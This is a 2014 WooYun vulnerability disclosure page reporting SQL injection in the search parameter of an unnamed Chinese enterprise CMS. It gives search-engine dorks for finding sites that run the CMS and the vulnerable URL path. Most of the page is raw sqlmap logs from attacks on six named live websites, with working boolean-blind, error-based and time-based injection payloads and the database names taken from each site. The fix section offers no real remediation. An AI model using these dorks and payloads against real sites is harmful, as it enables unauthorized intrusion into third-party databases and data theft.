当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-063717

漏洞标题:某企业建站系统搜索框一处sql注入

相关厂商:某企业建站系统

漏洞作者: Mosuan

提交时间:2014-06-06 11:45

修复时间:2014-09-04 11:46

公开时间:2014-09-04 11:46

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-06-06: 细节已通知厂商并且等待厂商处理中
2014-06-11: 厂商已经确认,细节仅向厂商公开
2014-06-14: 细节向第三方安全合作伙伴开放
2014-08-05: 细节向核心白帽子及相关领域专家公开
2014-08-15: 细节向普通白帽子公开
2014-08-25: 细节向实习白帽子公开
2014-09-04: 细节向公众公开

简要描述:

女神是什么?

详细说明:

百度关键词

关于我们| 联系方式| 客户留言| 人才招聘| 相关知识| 友情链接 版权所有 Copyright


google关键词

inurl:/page/contact/contact.php


去掉路径,然后加上

/search/index.php?key=1


例如

http://www.shyhsm.com/search/index.php?key=1


举几个例子

注入地址:http://dormahk.com/search/index.php?key=1
sqlmap/1.0-dev - automatic SQL injection and database takeover tool
http://www.sqlmap.org
[!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual
consent is illegal. It is the end user's responsibility to obey all applicable
local, state and federal laws. Authors assume no liability and are not responsib
le for any misuse or damage caused by this program
[*] starting at 23:41:54
[23:41:55] [INFO] using 'C:\Users\Administrator\Desktop\渗透工具\sqlmap GUI汉化
版\rar\output\dormahk.com\session' as session file
[23:41:55] [INFO] testing connection to the target url
[23:41:57] [INFO] testing if the url is stable, wait a few seconds
[23:42:01] [INFO] url is stable
[23:42:01] [INFO] testing if GET parameter 'key' is dynamic
[23:42:03] [INFO] confirming that GET parameter 'key' is dynamic
[23:42:05] [INFO] GET parameter 'key' is dynamic
[23:42:10] [INFO] heuristic test shows that GET parameter 'key' might be injecta
ble (possible DBMS: MySQL)
[23:42:10] [INFO] testing sql injection on GET parameter 'key'
[23:42:10] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[23:42:28] [INFO] GET parameter 'key' is 'AND boolean-based blind - WHERE or HAV
ING clause' injectable
[23:42:28] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause
'
[23:42:31] [INFO] GET parameter 'key' is 'MySQL >= 5.0 AND error-based - WHERE o
r HAVING clause' injectable
[23:42:31] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[23:42:34] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[23:43:34] [INFO] GET parameter 'key' is 'MySQL > 5.0.11 AND time-based blind' i
njectable
[23:43:34] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[23:43:40] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
GET parameter 'key' is vulnerable. Do you want to keep testing the others (if an
y)? [y/N] y
sqlmap identified the following injection points with a total of 33 HTTP(s) requ
ests:
---
Place: GET
Parameter: key
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: key=1') AND 6976=6976 AND ('oGup'='oGup
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: key=1') AND (SELECT 8779 FROM(SELECT COUNT(*),CONCAT(0x3a747a6c3a,(
SELECT (CASE WHEN (8779=8779) THEN 1 ELSE 0 END)),0x3a69656b3a,FLOOR(RAND(0)*2))
x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND ('xwAt'='xwAt
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: key=1') AND SLEEP(5) AND ('JAuW'='JAuW
---
[23:45:07] [INFO] the back-end DBMS is MySQL
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, PHP 5.2.17
back-end DBMS: MySQL 5.0
[23:45:07] [INFO] fetching database names
[23:45:08] [INFO] the SQL query used returns 2 entries
[23:45:08] [INFO] retrieved: information_schema
[23:45:09] [INFO] retrieved: a0209161202
available databases [2]:
[*] a0209161202
[*] information_schema
[23:45:09] [INFO] Fetched data logged to text files under 'C:\Users\Administrato
r\Desktop\渗透工具\sqlmap GUI汉化版\rar\output\dormahk.com'
[*] shutting down at 23:45:09


注入地址:http://cdrcgt.com/search/index.php?key=1
sqlmap/1.0-dev - automatic SQL injection and database takeover tool
http://www.sqlmap.org
[!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual
consent is illegal. It is the end user's responsibility to obey all applicable
local, state and federal laws. Authors assume no liability and are not responsib
le for any misuse or damage caused by this program
[*] starting at 23:45:51
[23:45:51] [INFO] using 'C:\Users\Administrator\Desktop\渗透工具\sqlmap GUI汉化
版\rar\output\cdrcgt.com\session' as session file
[23:45:51] [INFO] testing connection to the target url
[23:45:54] [INFO] testing if the url is stable, wait a few seconds
[23:45:57] [INFO] url is stable
[23:45:57] [INFO] testing if GET parameter 'key' is dynamic
[23:45:58] [INFO] confirming that GET parameter 'key' is dynamic
[23:45:59] [INFO] GET parameter 'key' is dynamic
[23:46:02] [INFO] heuristic test shows that GET parameter 'key' might be injecta
ble (possible DBMS: MySQL)
[23:46:02] [INFO] testing sql injection on GET parameter 'key'
[23:46:03] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[23:46:10] [INFO] GET parameter 'key' is 'AND boolean-based blind - WHERE or HAV
ING clause' injectable
[23:46:10] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause
'
[23:46:11] [INFO] GET parameter 'key' is 'MySQL >= 5.0 AND error-based - WHERE o
r HAVING clause' injectable
[23:46:11] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[23:46:12] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[23:47:12] [INFO] GET parameter 'key' is 'MySQL > 5.0.11 AND time-based blind' i
njectable
[23:47:12] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[23:47:19] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
GET parameter 'key' is vulnerable. Do you want to keep testing the others (if an
y)? [y/N] y
sqlmap identified the following injection points with a total of 35 HTTP(s) requ
ests:
---
Place: GET
Parameter: key
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: key=1' AND 1243=1243 AND 'Icqm'='Icqm
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: key=1' AND (SELECT 1148 FROM(SELECT COUNT(*),CONCAT(0x3a7165723a,(S
ELECT (CASE WHEN (1148=1148) THEN 1 ELSE 0 END)),0x3a7273643a,FLOOR(RAND(0)*2))x
FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'qDfA'='qDfA
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: key=1' AND SLEEP(5) AND 'cdqp'='cdqp
---
[23:48:49] [INFO] the back-end DBMS is MySQL
web server operating system: Linux CentOS
web application technology: Apache 2.2.21, PHP 5.2.17
back-end DBMS: MySQL 5.0
[23:48:49] [INFO] fetching database names
[23:48:50] [INFO] the SQL query used returns 3 entries
[23:48:51] [INFO] retrieved: information_schema
[23:48:52] [INFO] retrieved: cdrcgtdb
[23:48:53] [INFO] retrieved: test
available databases [3]:
[*] cdrcgtdb
[*] information_schema
[*] test
[23:48:53] [INFO] Fetched data logged to text files under 'C:\Users\Administrato
r\Desktop\渗透工具\sqlmap GUI汉化版\rar\output\cdrcgt.com'
[*] shutting down at 23:48:53


注入地址:http://www.fhzkgz.com/search/index.php?key=1
sqlmap/1.0-dev - automatic SQL injection and database takeover tool
http://www.sqlmap.org
[!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual
consent is illegal. It is the end user's responsibility to obey all applicable
local, state and federal laws. Authors assume no liability and are not responsib
le for any misuse or damage caused by this program
[*] starting at 23:48:39
[23:48:39] [INFO] using 'C:\Users\Administrator\Desktop\渗透工具\sqlmap GUI汉化
版\rar\output\www.fhzkgz.com\session' as session file
[23:48:39] [INFO] testing connection to the target url
[23:48:40] [INFO] testing if the url is stable, wait a few seconds
[23:48:45] [INFO] url is stable
[23:48:45] [INFO] testing if GET parameter 'key' is dynamic
[23:48:46] [INFO] confirming that GET parameter 'key' is dynamic
[23:48:47] [INFO] GET parameter 'key' is dynamic
[23:48:48] [INFO] heuristic test shows that GET parameter 'key' might be injecta
ble (possible DBMS: MySQL)
[23:48:48] [INFO] testing sql injection on GET parameter 'key'
[23:48:48] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[23:48:59] [INFO] GET parameter 'key' is 'AND boolean-based blind - WHERE or HAV
ING clause' injectable
[23:48:59] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause
'
[23:49:02] [INFO] GET parameter 'key' is 'MySQL >= 5.0 AND error-based - WHERE o
r HAVING clause' injectable
[23:49:02] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[23:49:08] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[23:50:08] [INFO] GET parameter 'key' is 'MySQL > 5.0.11 AND time-based blind' i
njectable
[23:50:08] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[23:50:25] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
GET parameter 'key' is vulnerable. Do you want to keep testing the others (if an
y)? [y/N] y
sqlmap identified the following injection points with a total of 35 HTTP(s) requ
ests:
---
Place: GET
Parameter: key
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: key=1' AND 3160=3160 AND 'Mkem'='Mkem
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: key=1' AND (SELECT 2819 FROM(SELECT COUNT(*),CONCAT(0x3a697a753a,(S
ELECT (CASE WHEN (2819=2819) THEN 1 ELSE 0 END)),0x3a696a693a,FLOOR(RAND(0)*2))x
FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'PHmA'='PHmA
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: key=1' AND SLEEP(5) AND 'sVbC'='sVbC
---
[23:51:08] [INFO] the back-end DBMS is MySQL
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, PHP 5.2.17
back-end DBMS: MySQL 5.0
[23:51:08] [INFO] fetching database names
[23:51:09] [INFO] the SQL query used returns 2 entries
[23:51:10] [INFO] retrieved: information_schema
[23:51:11] [INFO] retrieved: fhzkgz
available databases [2]:
[*] fhzkgz
[*] information_schema
[23:51:11] [INFO] Fetched data logged to text files under 'C:\Users\Administrato
r\Desktop\渗透工具\sqlmap GUI汉化版\rar\output\www.fhzkgz.com'
[*] shutting down at 23:51:11


注入地址:http://www.shyhsm.com/search/index.php?key=1
sqlmap/1.0-dev - automatic SQL injection and database takeover tool
http://www.sqlmap.org
[!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual
consent is illegal. It is the end user's responsibility to obey all applicable
local, state and federal laws. Authors assume no liability and are not responsib
le for any misuse or damage caused by this program
[*] starting at 23:51:22
[23:51:22] [INFO] using 'C:\Users\Administrator\Desktop\渗透工具\sqlmap GUI汉化
版\rar\output\www.shyhsm.com\session' as session file
[23:51:22] [INFO] testing connection to the target url
[23:51:25] [INFO] testing if the url is stable, wait a few seconds
[23:51:32] [INFO] url is stable
[23:51:32] [INFO] testing if GET parameter 'key' is dynamic
[23:51:33] [INFO] confirming that GET parameter 'key' is dynamic
[23:51:35] [INFO] GET parameter 'key' is dynamic
[23:51:37] [INFO] heuristic test shows that GET parameter 'key' might be injecta
ble (possible DBMS: MySQL)
[23:51:37] [INFO] testing sql injection on GET parameter 'key'
[23:51:37] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[23:52:10] [INFO] GET parameter 'key' is 'AND boolean-based blind - WHERE or HAV
ING clause' injectable
[23:52:10] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause
'
[23:52:12] [INFO] GET parameter 'key' is 'MySQL >= 5.0 AND error-based - WHERE o
r HAVING clause' injectable
[23:52:12] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[23:52:14] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[23:53:18] [INFO] GET parameter 'key' is 'MySQL > 5.0.11 AND time-based blind' i
njectable
[23:53:18] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[23:54:06] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
GET parameter 'key' is vulnerable. Do you want to keep testing the others (if an
y)? [y/N] y
sqlmap identified the following injection points with a total of 35 HTTP(s) requ
ests:
---
Place: GET
Parameter: key
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: key=1' AND 9439=9439 AND 'MKyj'='MKyj
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: key=1' AND (SELECT 9890 FROM(SELECT COUNT(*),CONCAT(0x3a75676e3a,(S
ELECT (CASE WHEN (9890=9890) THEN 1 ELSE 0 END)),0x3a6371633a,FLOOR(RAND(0)*2))x
FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'ntlK'='ntlK
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: key=1' AND SLEEP(5) AND 'NlPf'='NlPf
---
[23:55:16] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL 5.0
[23:55:16] [INFO] fetching database names
[23:55:20] [INFO] the SQL query used returns 3 entries
[23:55:22] [INFO] retrieved: information_schema
[23:55:26] [INFO] retrieved: a0801150405
[23:55:32] [INFO] retrieved: test
available databases [3]:
[*] a0801150405
[*] information_schema
[*] test
[23:55:32] [INFO] Fetched data logged to text files under 'C:\Users\Administrato
r\Desktop\渗透工具\sqlmap GUI汉化版\rar\output\www.shyhsm.com'
[*] shutting down at 23:55:32


注入地址:http://www.szxya.com//search/index.php?key=1
sqlmap/1.0-dev - automatic SQL injection and database takeover tool
http://www.sqlmap.org
[!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual
consent is illegal. It is the end user's responsibility to obey all applicable
local, state and federal laws. Authors assume no liability and are not responsib
le for any misuse or damage caused by this program
[*] starting at 23:53:28
[23:53:28] [INFO] using 'C:\Users\Administrator\Desktop\渗透工具\sqlmap GUI汉化
版\rar\output\www.szxya.com\session' as session file
[23:53:28] [INFO] testing connection to the target url
[23:53:36] [INFO] testing if the url is stable, wait a few seconds
[23:53:38] [INFO] url is stable
[23:53:38] [INFO] testing if GET parameter 'key' is dynamic
[23:53:39] [INFO] confirming that GET parameter 'key' is dynamic
[23:53:41] [INFO] GET parameter 'key' is dynamic
[23:53:43] [INFO] heuristic test shows that GET parameter 'key' might be injecta
ble (possible DBMS: MySQL)
[23:53:43] [INFO] testing sql injection on GET parameter 'key'
[23:53:43] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[23:53:56] [INFO] GET parameter 'key' is 'AND boolean-based blind - WHERE or HAV
ING clause' injectable
[23:53:56] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause
'
[23:53:58] [INFO] GET parameter 'key' is 'MySQL >= 5.0 AND error-based - WHERE o
r HAVING clause' injectable
[23:53:58] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[23:54:01] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[23:55:01] [INFO] GET parameter 'key' is 'MySQL > 5.0.11 AND time-based blind' i
njectable
[23:55:01] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[23:55:24] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
GET parameter 'key' is vulnerable. Do you want to keep testing the others (if an
y)? [y/N] y
sqlmap identified the following injection points with a total of 33 HTTP(s) requ
ests:
---
Place: GET
Parameter: key
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: key=1') AND 4002=4002 AND ('KIfi'='KIfi
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: key=1') AND (SELECT 3845 FROM(SELECT COUNT(*),CONCAT(0x3a6e68713a,(
SELECT (CASE WHEN (3845=3845) THEN 1 ELSE 0 END)),0x3a6663683a,FLOOR(RAND(0)*2))
x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND ('EmrX'='EmrX
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: key=1') AND SLEEP(5) AND ('TbMi'='TbMi
---
[23:56:29] [INFO] the back-end DBMS is MySQL
web application technology: Apache, PHP 5.2.17
back-end DBMS: MySQL 5.0
[23:56:29] [INFO] fetching database names
[23:56:34] [INFO] the SQL query used returns 2 entries
[23:56:37] [INFO] retrieved: information_schema
[23:56:42] [INFO] retrieved: szxya
available databases [2]:
[*] information_schema
[*] szxya
[23:56:42] [INFO] Fetched data logged to text files under 'C:\Users\Administrato
r\Desktop\渗透工具\sqlmap GUI汉化版\rar\output\www.szxya.com'
[*] shutting down at 23:56:42


注入地址:http://www.atosn.com/search/index.php?key=1
sqlmap/1.0-dev - automatic SQL injection and database takeover tool
http://www.sqlmap.org
[!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual
consent is illegal. It is the end user's responsibility to obey all applicable
local, state and federal laws. Authors assume no liability and are not responsib
le for any misuse or damage caused by this program
[*] starting at 23:55:30
[23:55:30] [INFO] using 'C:\Users\Administrator\Desktop\渗透工具\sqlmap GUI汉化
版\rar\output\www.atosn.com\session' as session file
[23:55:30] [INFO] testing connection to the target url
[23:55:35] [INFO] testing if the url is stable, wait a few seconds
[23:55:38] [INFO] url is stable
[23:55:38] [INFO] testing if GET parameter 'key' is dynamic
[23:55:39] [INFO] confirming that GET parameter 'key' is dynamic
[23:55:44] [INFO] GET parameter 'key' is dynamic
[23:55:45] [INFO] heuristic test shows that GET parameter 'key' might be injecta
ble (possible DBMS: MySQL)
[23:55:45] [INFO] testing sql injection on GET parameter 'key'
[23:55:45] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[23:55:58] [INFO] GET parameter 'key' is 'AND boolean-based blind - WHERE or HAV
ING clause' injectable
[23:55:58] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause
'
[23:56:00] [INFO] GET parameter 'key' is 'MySQL >= 5.0 AND error-based - WHERE o
r HAVING clause' injectable
[23:56:00] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[23:56:01] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[23:57:02] [INFO] GET parameter 'key' is 'MySQL > 5.0.11 AND time-based blind' i
njectable
[23:57:02] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[23:57:49] [CRITICAL] connection timed out to the target url or proxy, sqlmap is
going to retry the request
[23:57:49] [WARNING] most probably web server instance hasn't recovered yet from
previous timed based payload. If the problem persists please wait for few minut
es and rerun without flag T in option '--technique' (e.g. --flush-session --tech
nique=BEUS) or try to lower the value of option '--time-sec' (e.g. --time-sec=2)
[23:58:20] [CRITICAL] connection timed out to the target url or proxy, sqlmap is
going to retry the request
[23:58:51] [CRITICAL] connection timed out to the target url or proxy, sqlmap is
going to retry the request
[23:59:03] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
GET parameter 'key' is vulnerable. Do you want to keep testing the others (if an
y)? [y/N] y
sqlmap identified the following injection points with a total of 33 HTTP(s) requ
ests:
---
Place: GET
Parameter: key
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: key=1') AND 1027=1027 AND ('IjbH'='IjbH
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: key=1') AND (SELECT 8786 FROM(SELECT COUNT(*),CONCAT(0x3a6371643a,(
SELECT (CASE WHEN (8786=8786) THEN 1 ELSE 0 END)),0x3a6e67773a,FLOOR(RAND(0)*2))
x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND ('GpoL'='GpoL
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: key=1') AND SLEEP(5) AND ('EHjM'='EHjM
---
[00:00:18] [INFO] the back-end DBMS is MySQL
web application technology: Apache, PHP 5.2.17
back-end DBMS: MySQL 5.0
[00:00:18] [INFO] fetching database names
[00:00:22] [INFO] the SQL query used returns 2 entries
[00:00:25] [INFO] retrieved: information_schema
[00:00:30] [INFO] retrieved: atosn
available databases [2]:
[*] atosn
[*] information_schema
[00:00:30] [INFO] Fetched data logged to text files under 'C:\Users\Administrato
r\Desktop\渗透工具\sqlmap GUI汉化版\rar\output\www.atosn.com'
[*] shutting down at 00:00:30


漏洞证明:

详细说明

修复方案:

你们懂的!!

版权声明:转载请注明来源 Mosuan@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2014-06-11 10:00

厂商回复:

CNVD确认并通过多个实例确认通用性,与\\\视为同一CMS类似问题,后续统一由CNVD尝试联系软件生产厂商左右互联处置。其余漏洞仅确认不再单独评分。

最新状态:

暂无